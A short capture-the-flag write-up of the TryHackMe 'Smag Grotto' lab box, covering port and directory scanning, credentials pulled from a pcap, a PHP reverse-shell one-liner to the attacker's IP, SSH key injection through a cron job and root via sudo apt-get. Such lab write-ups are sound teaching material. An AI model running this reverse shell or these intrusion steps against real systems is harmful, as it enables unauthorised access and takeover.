SMAG-GROTTO | THM

Executive Summary

The server has hardcoded details present within a public facing email chain. Those credentials can be abused to get access to an admin portal and from there a reverse shell can be initiated. Once on the box itself, the ssh key infastructure is vulnerable to injection. An attacker can inject his own ssh key pair and move laterally from there. Once on as a regular user, credentials can be extracted from easily accessible log files. User can also escalate to root through sudo abuse of the apt-get program.

Technical Details

Enumeration

First, lets see what is running on the box:

nmap 10.10.6.75

Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-20 01:12 EST

Nmap scan report for 10.10.6.75

Host is up (0.085s latency).

Not shown: 998 closed tcp ports (conn-refused)

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

Lets navigate to the webserver that is running. Not much is here so lets enumerate the webserver:

gobuster dir -w /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u 10.10.6.75 -x txt,php -t64

/mail (Status: 301) [Size: 307] [–> http://10.10.6.75/mail/] /index.php (Status: 200) [Size: 402]

/mail is interesting. Upon investigation, there is a .pcap file discussed on this public facing webserver. There is a specific comment to use wget to download the file. If we download that file with wget and open with Wireshark, it is a short file with some TCP connections. Right clicking and selecting follow TCP stream will reveal some credentials being transmitted in clear text.

nice. There is one wrinkle, the POST request for this file is aimed at the hostname development.smag.thm. So, we need to tie that hostname to the IP address of the box. We can do that by editing our /etc/hosts file.

10.10.6.75 development.smag.thm

Then we can navigate to the endpoint that was found in the PCAP file. Upon navigating there we find a login screen.

Initial Foothold

When we login, there is a prompt that will let us send a command. Perfect for a reverse shell. A simple oneliner shell command from the Pentest Monkey will work.

php -r ‘$sock=fsockopen(“10.6.10.177”,9999);exec(“/bin/sh -i <&3 >&3 2>&3”);’

Lateral Movement

id -> www and we can’t read /home/jake/user.txt. After some basic linux enumeration, we find an interesting crontab. The public key is being regularly updated to the user’s ssh directory. We can inject our own key pair after running ssh-keygen -o on our own box. Then wait. Then we can ssh with -i {path_to_key} jake@10.6.10.177

Priv Esc

Now we are in as Jake. Priv Esc isn’t needed to read the root flag, you can just read the vim history. Run the classic sudo -l and we find a viable path to escalation through sudo apt-get. Follow the instructions on GTFO bins to acheive this.

Sparse write up will be more detailed in future.